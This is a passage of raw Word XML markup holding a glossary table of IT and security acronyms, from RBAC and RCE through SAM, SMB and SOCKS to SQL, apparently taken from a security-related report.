              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Random Access Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="073050B2" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B9045BC" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18D0393B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Role Based Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="27DDB093" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63948258" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53596753" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="25ABB8C0" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7ECBAD92" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="66CEC6C1" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remote Desktop Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4C4E6C58" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="47DB6109" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="46267474" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Radio Frequency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="0EC1E51D" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="779F3C83" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32E177E9" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remote Method Invocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="09D5D1A7" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3F7F373E" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RMM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E7717B9" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remote Monitoring and Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="0B3D8524" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6AD8A50B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="14408BBD" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remote Procedure Call</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="7E3D2D48" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="52296163" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1889EC5B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1696F623" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5CD8502B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="718857A3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security Assurance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="036EF61C" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="386D622D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SaaS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="575C1A6F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">software-as-a-service </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="339FE7EA" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="52E44538" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A406643" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Accounts Manager </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4D93FAB8" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1890D21A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SCCM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="06D8FDF9" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>System Center Configuration Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="47023994" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="410646B3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SFTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="28D32369" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Secure or SSH FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="72DC7801" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3B67B2B7" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="143FE90E" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Secure Hash Algorithm using 256 digest bits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4286E4DA" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0EF4A7DE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AD89988" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Service Level Agreement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1867AC98" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C064EFE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="29115146" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Server Message Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="5035F8DF" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C55059B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SOCKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44C4E29A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SOCKet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="63A9122C" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4199756D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="373ABE73" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Serial over LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="71B8BC23" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="682B1E5D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5938C3B4" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
